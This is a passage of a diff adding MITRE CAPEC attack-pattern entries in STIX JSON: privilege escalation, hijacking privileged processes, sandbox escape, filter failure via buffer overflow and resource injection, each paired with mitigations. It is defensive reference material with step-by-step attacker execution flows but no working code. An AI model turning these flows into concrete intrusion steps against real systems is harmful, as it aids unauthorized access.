"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a7e323e-7ab6-42f3-a56d-42335147b140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.", + "external_references": [ + { + "external_id": "CAPEC-233", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/233.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-600", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.html" + } + ], + "id": "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Privilege Escalation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.", + "external_references": [ + { + "external_id": "CAPEC-234", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/234.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + } + ], + "id": "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a privileged process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find process with elevated priveleges: The adversary probes for processes running with elevated privileges.

    2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Find vulnerability in running process: The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.

    2. Techniques
    Look for improper input validation
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.
    Utilize system utilities that support process control that have been inadequately secured

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found and hijacks the running process.

", + "x_capec_prerequisites": [ + "The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not have enough distinction from CAPEC-30 : Hijacking a Privileged Thread of Execution. Please refer to CAPEC-30 moving forward.", + "external_references": [ + { + "external_id": "CAPEC-236", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/236.html" + } + ], + "id": "attack-pattern--6616521d-b2f8-49c0-95cd-587eab111f91", + "modified": "2021-10-21T00:00:00.000Z", + "name": "DEPRECATED: Catching exception throw/signal from privileged block", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

    2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

    3. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

    2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

    2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", + "id": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8d07f3e-4893-4581-9ddd-565364f55f22", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", + "id": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1bf353f-a708-448c-8b53-22dadacd7c49", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", + "id": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9627981c-870d-4aff-a472-cb655535e9f3", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Get latest updates for the computer.", + "id": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22d46b75-55c1-431a-a27b-350b72fa6541", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-238", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/238.html" + } + ], + "id": "attack-pattern--481983de-2023-47f1-be60-642556a65376", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Using URL/codebase / G.A.C. (code source) to convince sandbox of privilege", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not contain any content and did not serve any useful purpose. Please refer to \"CAPEC-207: removing Important Client Functionality\" going forward.", + "external_references": [ + { + "external_id": "CAPEC-239", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/239.html" + } + ], + "id": "attack-pattern--f7c4e923-3a66-458b-8bfe-bbeeebefe86a", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Subversion of Authorization Checks: Cache Filtering, Programmatic Security, etc.", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).", + "external_references": [ + { + "external_id": "CAPEC-24", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/24.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Filter Failure through Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.\n ", + "A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.", + "Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

    2. Techniques
    Spidering web sites for inputs that involve potential filtering
    Brute force guessing of filtered inputs

Experiment

  1. Attempt injections: Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.

    2. Techniques
    Brute force attack through black box penetration test tool.
    Fuzzing of communications protocols
    Manual testing of possible inputs with attack data.

  2. Monitor responses: Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?

    3. Techniques
    Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
    Check Log files. An attacker with access to log files can look at the outcome of bad input.

Exploit

  1. Abuse the system through filter failure: An attacker writes a script to consistently induce the filter failure.

    2. Techniques
    DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
    Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
    An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Ability to control the length of data passed to an active filter." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b078701a-fc7f-4782-8328-f24692e8b6f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design: Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operational: Use OS-level preventative functionality. Not a complete solution.", + "id": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5152f113-a2d4-4665-bec3-a45da5d7b399", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adcbc9cc-ab6a-4107-bbb0-3c1ad2233710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 